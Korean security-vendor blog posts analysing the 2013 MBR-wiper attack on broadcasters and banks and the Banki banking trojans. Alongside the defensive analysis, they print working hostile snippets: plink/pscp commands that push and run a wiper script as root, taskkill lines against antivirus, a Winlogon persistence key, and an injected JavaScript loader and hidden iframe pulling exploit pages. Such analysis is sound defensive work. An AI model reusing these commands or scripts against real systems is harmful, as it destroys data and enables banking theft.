안랩(대표 김홍선, www.ahnlab.com)25일 악성코드의 추가배포 징후를 포착하여 고객 및 개인 PC 사용자의 주의를 당부했다.

 

이번 악성코드의 추가 배포는 오늘 오전 10 30분부터 시작되었고 기업은 물론이고 개인용 PC(불특정 일반인) 대상으로 유포되었다는 점이 특징이다.

 

안랩은 어제(24) 오전 9시 경 변종을 발견하여 분석한 결과 1차 공격에 사용된 악성코드의 특징인 MBR(Master Boot Record) 파괴기능은 물론 C&C(Command & Control) 서버와 통신하는 백도어 설치기능이 추가되었음을 확인했다고 밝혔다.

 

3 20일 방송사와 금융사의 전산망을 마비시킨 1차 공격은 내부 타이머로 공격시간대를 특정한 반면 이번 공격에서는 C&C(Command & Control) 서버와 교신하여 공격자가 원하는 시간대에 공격을 할 수 있도록 되어있다. 특히 이 악성코드는 기존 백신의 진단/치료를 방해하는 기능이 있다.

 

안랩은 ASD엔진의 DNA기술을 이용하여 해당 악성코드를 이미 2013.03.20.07 엔진(20일 오후 9 38분부터 배포)부터 이미 선제 대응이 가능했다.

 

안랩의 V3에 탑재된 ASD(AhnLab Smart Defense) 엔진에서는 해당 악성코드를 유포 하루 전 인 24일 오전 9시경에 수집하였으며관련 정부기관의 조치로 현재 악성코드 유포 사이트 및 C&C서버는 차단된 상태이다.

 

"오늘 오전 10 30 ~ 오후 1 45분까지는 수백 대 이상의 PC가 감염됐을 것으로 추정한다.” 또한 "현재 C&C서버가 차단되어 실행명령은 내려올 수 없으나 기존과는 다른 다양한 방식으로 변종 배포를 시도하고 있어서 기업뿐 아니라 일반 PC사용자들도 주의해야 한다.



신고
Posted by DH, L@@

3월 20일 14시경 주요 방송사 및 은행 전산망 장애가 발생하는 사고가 한국에서 발생하였으며, ASEC에서는 악성코드 감염 후 디스크 손상으로 부팅 불가로 인해 장애가 발생한 것으로 확인하였다.


현재 해당 악성코드는 운영체제에 따라 디스크를 손상시키는 기능이 포함되어 있으며, 상세한 디스크 손상 내용은 아래 분석 정보에 기술하였다.


해당 악성코드는 V3 엔진(엔진버전:  2013.03.20.06 이상)으로 업데이트 할 경우 검사 및 치료가 가능하며, 3월 20일 오후 6시경부터 제공 중인 전용백신으로도 검사 및 치료 할 수 있다.


[UPDATE - 2013/03/25]


현재까지 ASEC에서 분석한 이번 주요 방송사 및 은행 전산망 장애를 유발한 악성코드는 다음 이미지와 같이 A 케이스와 B 케이스로 나누어서 발생하였다.



우선 위 이미지 좌측 편의 A 케이스에 사용되었던 파일들에 대한 세부 분석 내용은 다음과 같다.


우선 드로퍼인 File A는  %Temp% 폴더에 다음 파일들을 생성하게 된다.


1) File B : MBR 파괴 기능 수행

2) File C : UPX 압축 된 SSL 연결을 위한 PUTTY 툴

3) File D : UPX 압축된 SFTP 연결을 위한 PUTTY 툴

4) File E : UNIX 계열 시스템 DISK를 파괴하는 스크립트


File E 스크립트가 대상으로 하는 시스템은 AIX Unix, HP Unix, Solaris 및 Linux 이다.


AIX, HP, Solaris 3개 시스템에서는 DD 명령어로 디스크를 10MB 및 81MB 크기 만큼 0으로 덮어 쓰기 하며, Linux 시스템에서는 다음의 디렉토리를 삭제한다.


/kernel/ 

/usr/ 

/etc/ 

/home/


File A에 의해 생성된 File B가 실행이 되면, %Temp% 폴더에 ~v3.log 파일이 존재하는지 확인 하게 된다. 만약 해당 파일이 존재 하지 않다면 감염 된 시스템의 MBR(Master Boot Recoard) 및 하드 디스크를 파괴하게 된다.



그리고 File A 외부에서 원격 접속을 시도하기 위해, 다음 경로의 환경 설정 파일인 confCons.xml가 존재하는지 확인 하게 된다.


- Major Version 5인 경우 ( Windows XP, Windows 2003 Server 등 )

C:\Documents and settings\Administrator\Local Settings\Application Data\Felix_Deimel\mRemote\confCons.xml


- Major Version 6인 경우 ( Windows 7, Windows VISTA 등 )

C:\Users\AppData\Local\Felix_Deimel\mRemote\confCons.xml


만약 confCons.xml가 존재 할 경우에는 다음 문자열에 해당하는 내용을 추출한다.


Username="root"

Protocol="SSH"

Password=

Hostname

Descr

Panel

Port

Password


그리고 하나의 스레드를 생성 한 후 앞서 획득한 문자열들을 조합하여 다음의 명령을 실행하게 된다.


%Temp%\File C -batch -P [port] -l root -pw  %Temp%\~pr1.tmp [host]:/tmp/cups

%Temp%\File D -batch -P [port] -l root -pw  [host] "chmod 755 /tmp/cups;/tmp/cups"


SSH의 SCP의 PUTTY 버전인 pscp를 이용해서 File E 를 Batch(Disable all interactive prompts) 종료 후, root 계정으로 호스트의 /tmp/cups 로 복사한다. 그리고, PUTTY의 command 버전인 plink 를 이용해 Batch(disable all interactive prompts) 종료 후, root 계정으로 호스트의 /tmp/cups 에 실행권한을 주고, /tmp/cpus 를 실행한다. 


이와 함께 외부에서 원격 접속을 시도하기 위한 다른 방법으로 다음 경로의 환경 설정 파일이 존재하는 확인하게 된다.


- Major Version 5인 경우 ( Windows XP, Windows 2003 Server 등 )

C:\Documents and settings\Administrator\Application Data\VanDyke\Config\ Sessions\*.ini


- Major Version 6인 경우 ( Windows 7, Windows VISTA 등 )

C:\Users\AppData\Roaming\VanDyke\Config\Sessions\*.ini


만약 환경 설정 파일이 존재 할 경우에는 다음 문자열에 해당하는 내용을 추출하게 된다.


S:"Protocol Name"=SSH

S:"Username"=root

D:"Session Password Saved"=00000001

S:"Hostname"=

S:"Password"=

D:"[SSH2] Port"=


그리고 하나의 스레드를 생성 한 후 앞서 획득한 문자열들을 조합하여 다음의 명령을 실행하게 된다.


%Temp%\conime.exe -batch -P [port] -l root -pw  %Temp%\~pr1.tmp [host]:/tmp/cups

%Temp%\alg.exe -batch -P [port] -l root -pw  [host] "chmod 755 /tmp/cups;/tmp/cups"


MBR(Master Boot Recoard) 및 하드 디스크를 파괴하는 기능을 수행하는 File B는 아래와 같은 파일 매핑 오브젝트(FileMapping Object)를 이용하여 동기화 한 후 하나의 프로세스 만이 실행되도록 한다.


JO840112-CRAS8468-11150923-PCI8273V



그리고  %SystemDirectory%\TEMP\~v3.log 이름의 파일이 존재하는지 확인 한 후, 만약 존재하지 않는다면 MBR(Master Boot Recoard) 및 하드 디스크를 파괴하는 기능을 수행하게 된다.


이와 함께 Taskkill 명령을 WinExeC API로 호출 하여 국내 보안 소프트웨어 프로세스를 종료 하게 된다.


Taskkill /F /IM pasvc.exe

Taskkill /F /IM clisvc.exe


File B는 감염 된 시스템의 윈도우(Windows) 버전에 따라 서로 다른 하드 디스크 파괴 스레드(Thread) 를 생성하게 된다.


1) Major Version 5인 경우 ( Windows XP, Windows 2003 Server 등 )


* 물리 디스크의 MBR과 VBR 등을 "PRINCPES" 문자열로 덮어 쓰기


최대 10개 까지 물리 디스크( \\PHYSICALDRIVE0 ~ \\PHYSICALDRIVE9 )를 열어 각 물리 디스크의 MBR과 VBR을 "PRINCPES"이라는 문자열로 반복하여 덮어 쓰게 된다. 확장 파티션을 사용하고 있는 시스템의 경우에는 확장 파티션의 각 파티션의 VBR까지 파괴의 대상이 된다.


* 논리 드라이브를 "PRINCPES" 문자열로 덮어 쓰기


B:\부터 Z:\ 까지 모든 논리 드라이브 중에서 드라이브 타입(Drive Type)이 DRIVE_REMOVABLE이나 DRIVE_FIXED인 드라이브의 데이터를 "PRINCIPES"이라는 문자열로 반복하여 덮어 쓰게 된다. 덮어 쓰게 되는 데이터는 약 5.3MB 간격으로 100KB 씩 덮어 쓰게 된다.


2) Major Version 6인 경우 ( Windows 7, Windows VISTA 등 )


* 물리 디스크의 MBR과 VBR 등을 "PRINCPES" 문자열로 덮어 쓰기


최대 10개 까지 물리 디스크( \\PHYSICALDRIVE0 ~ \\PHYSICALDRIVE9 )를 열어 각 물리 디스크의 MBR과 VBR을 "PRINCPES"이라는 문자열로 반복하여 덮어 쓰게 된다. 확장 파티션을 사용하고 있는 시스템의 경우에는 확장 파티션의 각 파티션의 VBR까지 파괴의 대상이 된다.


* 모든 논리 드라이브의 데이터를 "PRINCPES" 문자열로 덮어 쓴 후 삭제


모든 논리 드라이브의 데이터를 "PRINCPES" 문자열을 반복하여 덮어 씀으로써 원본 파일 내용을 제거 한 뒤, 모든 파일을 DeleteFile API로 삭제하고 모든 디렉토리를 RemoveDirectoryA API로 삭제 한다. 그리고 D:\부터 차례대로 드라이브의 파일 시스템을 제거 한 뒤, 마지막으로 C:\에서 제거한다. 그러나, C:\의 %SystemDirectory%, %ProgramData%, %ProgramFiles% 세 경로의 파일은 제거 하지 않는다.





논리 드라이브 파괴를 시작하고 나서 5분 뒤 "Shutdown -r -t 0 "라는 커맨드 라인(Command Line)을 WinExec로 실행 하여 시스템을 재부팅 시키나, 하드 디스크가 파괴 중일 경우에는 시스템은 재부팅 되지 않는다.



추가적으로 확인된 최초 이미지 우측 편의 B 케이스에 사용되었던 파일들에 대한 세부 분석 내용은 다음과 같다.


드로퍼(Dropper) 역할을 수행하는 File K가 실행이 되면 아래와 같이 국내 보안 소프트웨어의 프로세스들을 강제 종료하게 된다.


taskkill /F /IM vrfwsvc.exe

taskkill /F /IM vrptsvc.exe

taskkill /F /IM vrscan.exe

taskkill /F /IM hpcsvc.exe

taskkill /F /IM hsvcmod.exe

taskkill /F /IM vrfwsock.exe

taskkill /F /IM vrmonnt.exe

taskkill /F /IM vrrepair.exe

taskkill /F /IM vrmonsvc.exe


그리고 국내 보안 소프트웨어 관련 다음 파일들을 삭제를 시도하게 되며, 삭제된 파일들과 동일한 경로에 File FFile L을 생성하게 된다.

VrDown.exe 
VrPatch.exe
ptUpdate.exe
update.zip
vms1014.zip

생성된 File L은 디스크 파괴 기능을 수행하는 File F를 다운로드 하기 위한 환경 설정 파일이며, File F는 앞서 언급한 A 케이스의 File B와 동일한 기능을 수행하게 된다. 그러나, 아래와 같은 세가지 다른 차이점을 가지고 있다.


1) File F는 File B가 갖고 있는 ~V3.log 파일의 존재 여부를 통해 하드 디스크 파괴 여부를 결정하는 기능이 포함되어 있지 않다.


2) File B는 "PRINCPES" 문자열을 이용하여 덮어쓰기를 수행하게 되나, File F는 "HASTATI" 문자열을 이용하여 덮어쓰기를 수행하게 된다.


3) File B는 실행 즉시 특정 문자열을 이용해 덮어 쓰기를 수행하게 되는 반면에, File F는 2013년 03월 20일 14시 이후에 특정 문자열을 이용해 덮어 쓰기를 수행하게 된다.


[UPDATE - 2013/03/22]


ASEC에서는 이번 전산망 장애를 유발한 악성코드에 대한 새로운 변형과 함께 함께 앞서 언급한 두가지 감염 케이스들과 다른 형태를 추가적으로 발견하였다.


먼저 추가적으로 발견한 디스크 손상을 유발하는 악성코드 File G는 기존에 발견된 File BFile F 들과 기능상으로는 동일하지만 디스크 손상을 유발하기 위해 덮었는 문자열이 "PR!NCPES"으로만 변경되었다.



그리고 추가적으로 발견된 감염 케이스에 사용된 악성코드는 아래 이미지와 동일한 전체적인 구조를 가지고 동작하게 된다.



최초 File H는 File I와 File J 두 개의 파일을 윈도우 시스템 폴더(C:\Widnwos\system32)에 생성하고 File I 를 실행 시킨다. 실행된 File I는 같이 생성된 File J를 정상 시스템 프로세스인 Lsass.exe 프로세스에 인젝션 하게 된다. 


인젝션이 성공적으로 이루어지게 될 경우 인젝션된 File J 힙(Heap)을 할당 받은 후 인코딩(Encoding) 되어 있는 자신의 코드를 디코딩(Decoding) 하여 힙을 생성하여 스레드(Thread로) 구동 한다. 이 때 구동되는 스레드가 디스크를 앞서 언급한 File G와 동일한 "PR!NCPES" 문자열로 디스크를 덮어쓰게 된다.


우선 File H는 생성한 File I를 시스템이 재부팅 할 때마다 자동 실행하기 위해서 윈도우 레지스트리(Registry)에 다음의 키에 값을 추가하게 된다.


HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

Shell = explorer.exe, File I


그리고 생성한 윈도우 시스템 폴더에 생성한 File I와 File J의 시간 정보를 Kernel32.dll이 가지고 있는 시간 정보와 동일 하게 성정한다.


File H악성코드가 구동 될 수 있는 환경을 마련 한 뒤에 CMD.exe를 이용하여 ShellExecuteA 함수를 호출하여 자신을 삭제하게 된다.


그리고 생성된 File I는 SeDebugPrivilege 권한을 이용하여 같이 생성된 File J를 정상 시스템 프로세스인 Lsass.exe에 인젝션을 시도 하게 된다.


인젝션은 우선 정상 시스템인 Lsass.exe 프로세스를 찾은 후 File J의 파일명을 문자열로 메모리 할 당 이후, 해당 문자열을 인자로 하여 LoadLibraryW 함수를 시작 주소로 하여 CreateRemoteThread를 호출하는 기법을 이용하였다.


File J 인젝션에 성공하게 되면 XOR 0x55로 인코딩되어 있는 디스크 손상을 위한 코드를 디코딩 한 후에 할당 받은 메모리에 쓰게 된다.


그리고 GetLocalTime 함수를 이용하여 감염된 시스템의 현재 시간을 구한 후 3월 20일 15시가 되기 전까지 대기하게 된다.


이 후 3월 20일 15시 1분이 되면 디코딩 된 디스크 손상을 위해 Thread로 동작하며 전체적인 기능은 앞서 언급한 File G와 동일하나 아래 두 가지만 다르다.


1) 동기화에 사용되는 파일맴핑 오브젝트(FileMapping Object)를 GOLD0112-CRAS8468-PAGE0923-PCI8273W 사용


2) File G는 디스크 손상을 중단하는 파일명이 "~v3.log" 이었으나, File J은 "kb01.tmp"를 사용


현재까지 이번 전산망 장애 관련 악성코드들 모두 V3 제품 군에서 다음과 같이 진단한다.


Win-Trojan/Agent.24576.JPF (2013.03.20.06)

Win-Trojan/Agent.24576.JPG (2013.03.20.07)

Trojan/Win32.XwDoor (2013.03.20.07)

Dropper/Eraser.427520 (2013.03.20.07)

SH/Eraer (2013.03.20.07)

Dropper/Hijacker.153088 (2013.03.21.01)

Win-Trojan/Loader.49152 (2013.03.21.01)

Win-Trojan/Injector.46080.AX (2013.03.21.01)

Trojan/Win32.HDC (AhnLab, 2013.03.21.01) 


현재 ASEC에서는 추가적인 정보들을 지속적으로 수집중이며, 관련된 악성코드들의 상세한 분석 정보를 작성 중에 있다. 


분석정보가 작성되는데로 해당 정보는 수시로 업데이트 될 예정이다.

저작자 표시 비영리 변경 금지
신고
Posted by 비회원

안녕하세요. 안랩 ASEC(시큐리티대응센터) 입니.


3월 20일 14시경 주요 방송사 및 은행 전산망 장애가 발생하였습니다. 


악성코드 감염 후 디스크 손상으로 부팅 불가로 인해 장애가 발생한 것으로 확인되었고, 해당 악성코드는 아래와 같이 운영체제에 따라 디스크를 손상시키는 기능이 포함되어 있습니다.

- Windows XP, Windows 2003 Server
물리 디스크의 MBR과 VBR 등을 쓰레기 데이터 채움
논리 드라이브 파괴 

- Windows VISTA, Windows 7
물리 디스크 파괴
모든 논리 드라이브의 파일 내용을 삭제

해당 악성코드는 V3 엔진(엔진버전:  2013.03.20.06 이상)으로 업데이트하시면 검사/치료가 가능합니다.

또한 3월 20일 오후 6시경부터 제공 중인 전용백신으로도 검사/치료할 수 있습니다.

전용백신 다운로드 받기 

만약 전용백신으로 진단되는 악성코드가 있다면 이미 디스크가 손상되어 부팅이 안될 수 있으니 중요 데이터는 우선 백업을 받으시기를 권해드립니다.

안랩은 ASEC(시큐리티대응센터)과 CERT(컴퓨터침해사고대응센터)를 비롯해 전사 비상 대응 체제를 가동 중입니다. 


추가 정보가 확인되는 대로 안내해 드리겠습니다.


신고
Posted by DH, L@@

 

 취약점을 이용해서, PC 사용자가 감염사실을 인지 할 수 없도록 동작하는 국내 인터넷 뱅킹 정보 탈취 악성코드가 끊임없이 발견되고 있다. 과거 국내를 대상으로 제작된 정보 탈취 형 악성코드는 주로 주말에 취약점을 통해서 유포/확산 되었지만, 모니터링 결과 주중에도 변형을 제작하여 유포하고 있다.

 

국내 인터넷 뱅킹 정보 탈취 악성코드는 Windows 뿐만 아니라, Android 기반의 스마트폰 앱으로도 유포되었으며, 변종이 계속 발견되고 있다. 더욱이 구글 공식 마켓인 Play Store 에 등록되어 있어 그 영향이 작지 않을 것이다.

 

해킹된 웹사이트에 삽입된 악성 스크립트를 통하여 유포되는, 즉 취약점을 통하여 감염되는 흐름은 이 전에 다루었으므로 생략하겠다. 취약점을 통하여 PC에 다운로드/실행 되는 악성 파일은 아래와 같다.

 

hxxp://121.***.**.229:280/goutou.exe

 

해당 파일이 실행되면 아래와 같은 명령으로 시스템의 Hosts 파일이 변조된다.

이후 PC 사용자는 인터넷 뱅킹을 위해 정상(은행) 사이트를 방문하지만, 실제로는 제작자에 의하여 의도된 피싱(은행) 사이트로 접속하게 되는 것이다.

 

[그림 1] Hosts 파일 변조

 

사용자가 주의 깊게 살펴보지 않으면 정상 사이트와 구분하기 어렵다.

  • [인증절차]를 요구하는 피싱사이트

[그림 2] 정상 사이트(왼쪽) / 피싱 사이트(오른쪽)

 

다른 은행사이트(피싱)도 유사하게 [인증절차]를 요구하고 있다.

 

[그림 3] 은행(피싱)사이트

 

피싱 사이트에서 요구하는 [인증절차] 를 확인해 보면 아래와 같다.

 

[그림 4] 이름 / 주민번호 입력을 요구하는 피싱 사이트

 

위 페이지의 소스를 살펴보면 name_info1, 2, 3 사용자 이름과 주민번호를 인자 값으로 받아서 특정 서버로 전송할 것으로 추정된다.

 

[그림 5] 페이지 소스

이름과 주민번호 정보를 수집한 후에는 보안카드 비밀번호와 같은 추가 정보를 수집하기 위한 페이지로 이동된다.

 

[그림 6] 추가 정보 수집 페이지

 

실제 사용자에 의해 입력된 정보가 특정서버로 전송되는 과정은 아래와 같다.

 

[그림 7] 사용자에 의해 입력된 정보가 전송되는 과정

 

 

이러한 Windows 기반의 악성코드가 Android 기반의 스마트폰에서도 발견되었다.

 

아래 그림8의 페이지는 구글 마켓에 등록된 인터넷 뱅킹 정보 탈취형 악성 앱이다.

[그림 8] 구글 Play Store 에 등록된 악성 앱

 

"NH농협스마트뱅킹", "KB국민스마트뱅킹", "IBK 기업스마트뱅킹", "새마을금고스마트뱅킹", "우리스마트뱅킹"

5개 은행의 이용자를 타겟으로 제작되었으며, 하루 간격으로 변종이 유포되었다. 1월 15일에는 "LEAD TEAM", 16일에는 "ZHANG MENG", "waleriakowalczyk", 17일에는 "Kyle Desjardins" 의 제작자명으로 등록되어 유포되었다.

 

위 악성 앱 중에 하나를 확인해 보겠다.

 

[그림 9] 설치 화면(좌) / 실행 화면(우)

[그림 10] 피싱 사이트 접속 유도 화면

 

[그림 11] 은행(피싱)사이트 접속 화면

[그림 12] 은행(피싱)사이트 접속 화면

 

위 화면에서 볼 수 있듯이 사용자의 개인정보 및 인터넷 뱅킹 정보를 입력하도록 유도하고 있다.

 

해당 부분의 코드를 살펴보면 피싱사이트로 접속을 유도하는 부분을 확인할 수 있다.

[그림 13] 피싱 사이트 접속 유도의 일부 코드

 

[그림 14] 인터넷 뱅킹 정보 탈취 사이트의 일부 코드

 

Windows 기반의 악성코드 감염을 최소화하기 위해선 보안패치를 항상 최신으로 유지하고, 안전성이 확인되지 않은 파일공유사이트(p2p,토렌트)를 이용하지 않는 것이 좋다.

 

▶ Microsoft업데이트

http://update.microsoft.com

 

▶ Flash Player 업데이트

http://get.adobe.com/kr/flashplayer/

 

▶ Java (JRE) 업데이트

http://www.java.com/ko/

 

Android 기반의 금융 관련 앱을 설치할 떄는 해당 금융사가 등록한 것인지, 제작자가 올바른지 확인하고 설치하는 습관이 필요하다.

V3 제품에서는 아래와 같이 진단이 가능하다.

 

<V3 제품군의 진단명>

Trojan/Win32.Banki

Android-Trojan/Yaps

신고
Posted by DH, L@@

 지난 12월 국내 인터넷 뱅킹 사용자가 타켓인 악성코드(Banki)에서 특정 시스템 날짜가 되면 윈도우 시스템 파일을 삭제하는 기능이 발견되었다.

과거에 발견된 Banki정보는 아래 페이지에서 확인이 가능하다.

 

http://asec.ahnlab.com/search/banki

 

이번에 발견된 Banki 변종은 Induc 바이러스에 감염된 악성코드이며, http://210.***.**.32:2323/qq.exe 를 통하여 유포 되는 것으로 확인되었다.

(온라인 뱅킹 트로이목마 Banki(1) 에서 유포과정을 다루었다.)

 

위 파일이 실행되어 악성코드에 감염될 경우 아래와 같은 경로에 파일이 생성된다.

C:\Windows\system32\muis\tempblogs.\tempblogs..\

'1216', 'Winlogones.exe', 'csrsses.exe'

 

[그림1] 악성코드에 의하여 생성된 파일

 

 

감염 후 아래와 같이 레지스트리에 서비스로 등록되어, 부팅시 실행된다.

 

 

[그림2] 서비스 등록

실행된 환경에 따라 다르게 나타날 수 있지만, 악성 프로세스 'winlogones.exe'는 정상 프로세스인 'winlogon.exe' 에 자신을 인젝션하여 프로세스 목록에 'winlogones.exe' 가 보이지 않게 한다. 동시에 또 다른 악성 프로세스인 'csrsses.exe' 도 계산기 프로세스 이름인 'calc.exe' 에 자신을 인젝션하여 실행한다.

 

[그림3] 정상적인 프로세스만 동작하는 것으로 위장

 

또한, 악성코드는 'winlogones.exe' 가 존재하지 않을 경우, www.mi****.com/temp/q/m.mp3 로 접속하여 다시 다운로드 받게 되어 있다.

이후 프로세스 목록을 확인하여 'V3LSvc.exe', 'AYRTSrv.aye', 'Nsavsvc.npc' 가 없을 경우 아래의 파일을 추가로 다운받는다.

 

다운로드 주소

생성된 파일명

www.zhu*****.com/temp/q/1.mp3

ChilkatCert.dll

www.zhu*****.com/temp/q/q.mp3

qserver.exe

www.zhu*****.com/temp/q/2.mp3

iexplores.exe

www.zhu*****.com/temp/q/3930.mp3

termsrv.dll

www.zhu*****.com:2323/count.txt

count.txt

[표1] 다운로드 파일

 

다운로드 받은 파일은 아래의 경로에 생성된다.

C:\Windows\system32\muis\tempblogs.\tempblogs..\

 

이번 변종에서 발견된 가장 큰 특징은 특정 날짜(2013년 1월 16일)가 되면 시스템 파괴 기능이 동작하도록 제작 되었다.

 

해당 날짜가 되면 아래와 같은 배치 파일을 c:\ 에 생성하며 실행된다.

 

[그림4] 시스템 파괴 기능이 포함된 배치 파일

 

배치 파일에 의하여 ALG(Application Layer Gate) 서비스를 중지하고

hal.dll 파일과 System32 내의 파일을 삭제하게 된다.

 

배치 파일이 실행되면 아래와 같은 메시지가 발생한다.

 

[그림5] 시스템 파괴 기능 동작

 

 

만약, 시스템을 재부팅하게 되면, 아래와 같은 메시지가 나타나며, 정상적인 부팅이 불가능하다.

 

[그림6] 시스템 파괴 후 리부팅시 화면

 

 

 

해당 악성코드는 V3 제품을 통하여 진단 및 치료가 가능했기 때문에, 실제 피해 보고는 접하기 어려웠다.

 

<V3 제품군의 진단명>

Trojan/Win32.Banki

신고
Posted by DH, L@@

 Boland사에서 개발한 프로그래밍 언어인 Delphi에는 일부 버전(Delphi4 ~ 7)에서 사용하는 Sysconst 라이브러리가 있다. Win32/Induc 바이러스는 이 라이브러리를 감염 시킨 후 컴파일 과정에서 생성되는 EXE, DLL 등에 바이러스 코드를 삽입하는 기법의 바이러스이다.

 

Win32/Induc은 2009년 8월경 발견되었으며 그 당시 국내에서 제작 및 배포되고 있는 Delphi 기반의 프로그램들도 해당 바이러스에 감염된 사례가 다수 있었으나 불행 중 다행인 것은 위에서 언급한 것처럼 Win32/Induc은 Delphi소스에 자신의 코드를 삽입하는 기능만 있을 뿐 감염된 소스가 컴파일 되어 생성된 EXE, DLL을 일반 PC에서 실행시켜도 아무런 피해를 발생시키지 않는다. 만약 Win32/Induc이 Win32/Virut이과 동일한 기능(파일감염, IRC채널 접속, 보안 사이트 접속방해 등)을 가지고 있었다면 다수의 일반 PC들에서 피해가 발생했을 것이다.

 

* Win32/Induc 바이러스 조치 가이드:

http://www.ahnlab.com/kr/site/securitycenter/asec/asecIssueView.do?webAsecIssueVo.seq=57

 

2012년 12월 말 경, Delphi로 제작된 Win32/Induc에 감염된 온라인 뱅킹 트로이목마가 해킹된 국내 웹하드 사이트를 통해서 유포된 사례가 발견되었다.

 

• 웹하드 사이트: http://www.****hard.co.kr/common/JS/action2.js

 

action2.js파일의 내부에는 아래와 같이 자바 스크립트 코드가 삽입되어 있었고 국내 UCC 동영상 관련 사이트로부터 cp.js파일을 다운로드하도록 되어있다.

if(document.cookie.indexOf('ggads')==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='ggads=Yes;path=/;expires='+expires.toGMTString();document.write(unescape("<script src=http://ucc.******.co.kr/adsi/cp.js></script>"));}

 

•UCC동영상 사이트:http://ucc.******.co.kr/adsi/cp.js

cp.js파일에 저장된 코드는 아래와 같으며 특정 게임 사이트에서 또 다른 악성 스크립트를 다운로드하도록 되어있다.

document.write("<iframe src=http://flash.*****.pe.kr/adsi/adsi.htmlwidth=0 height=0></iframe>");

 

adsi.html 역시 동일한 사이트에서 index.html파일을 다운로드 하는데 해당 스크립트는 아래 그림처럼 Gongda Pack으로 난독화된 악성 스크립트이다.

 

•UCC동영상 사이트:http://ucc.******.co.kr/adsi/index.html

 

 

[그림 1] Gongda Pack으로 난독화된 index.html

 

위 [그림 1]에서처럼 index.html은 Gongda Pack 툴킷으로 난독화되어 있음을 알 수 있으며 국내 해킹된 사이트를 통해서 유포된 악성 스크립트의 대부분이 해당 툴킷을 통해서 난독화되어 있다. (참고로 index.html이 Gongda Pack으로 난독화되어 있음을 알 수 있는 부분은 바로 아래 부분이다.)

 

/*Encrypt By 210.***.53.***:2323's JSXX 0.44 VIP*/

 

난독화된 index.html파일을 풀어보면 아래처럼 우리가 흔히 사용하는 JAVA와 Internet Explorer에 존재하는 취약점을 이용하여 실행파일을 다운로드함을 알 수 있다.

 

[그림 2] 난독화 해제된 index.html

 

[그림 2]에서 보는 것처럼 qq.exe를 다운로드 및 실행하기 위해서 사용한 취약점은 아래 JAVA 5개, Internet Explorer 1개 등 총 6개를 사용한다.

 

Java : CVE-2010-0886, CVE-2011-3544, CVE-2012-0507, CVE-2012-4681, CVE-2012-5076

IE : CVE-2012-1889

 

위 취약점이 존재할 경우, 다운로드 되는 qq.exe의 내부 코드를 살펴보면 Delphi로 제작되었고 아

래 그림처럼 Win32/Induc 바이러스 코드가 존재함을 확인할 수 있다.

 

00003604 00403604 0 SOFTWARE\Borland\Delphi\RTL

00005568 00405568 0 Software\Borland\Locales

00005584 00405584 0 Software\Borland\Delphi\Locales

 

[그림 3] Win32/Induc 바이러스 코드가 포함된 qq.exe

 

qq.exe에 의해서 다운로드되는 2.mp3파일도 마찬가지로 아래 그림처럼 Win32/Induc 바이러스가 존재했다.

[그림 4] qq.exe에 의해서 다운로드되는 2.mp3

 

V3 제품에서는 아래와 같이 진단이 가능하다.

 

Win-Trojan/Prosti.132540

Trojan/Win32.Banki

신고
Posted by DH, L@@

안랩 ASEC에서 2012년 7월 국내,외에서 발생한 다양한 보안 위협 이슈와 동향들을 정리한 ASEC 리포트 2012 Vol.31을 발간하였다. 



이 번에 발간된 ASEC 리포트는 2012년 7월 주요 보안 위협 이슈들을 다음과 같이 분석하고 있다.


1) 악성코드 이슈

Banki 트로이목마의 공습

구글 코드를 악용한 악성코드 유포

국외 은행 피싱 메일

아래아한글 취약점을 악용한 파일 추가 발견

링크드인 스팸 메일과 결합된 블랙홀 웹 익스플로잇 툴킷

BHO에 등록되는 온라인 게임핵 악성코드

WinSocketA.dll 파일을 이용하는 온라인 게임핵

Cross-Platform 악성코드

위구르족을 타깃으로 한 맥 악성코드


2) 모바일 악성코드 이슈

APT 공격과 관련된 안드로이드 악성코드 발견

스마트폰에도 설치되는 애드웨어


3) 보안 이슈

DNS changer 감염으로 인한 인터넷 접속 장애 주의

BIND 9 취약점 발견 및 업데이트 권고

어느 기업의 데이터 유출 후, 고객에게 보내진 ‘보안 패치’ 메일의 비밀


4) 웹 보안 이슈

GongDa Pack의 스크립트 악성코드 증가

해킹된 동영상 사이트를 통한 악성코드 유포

XML 코어 서비스 취약점 악용으로 온라인 게임 악성코드 유포


ASEC에서 발간하는 월간 보안 위협 동향 리포트는 아래 웹 사이트에서 확인 할 수 있다. 


ASEC 보안 위협 동향 리포트 2012 Vol.31 발간


저작자 표시 비영리 변경 금지
신고
Posted by 비회원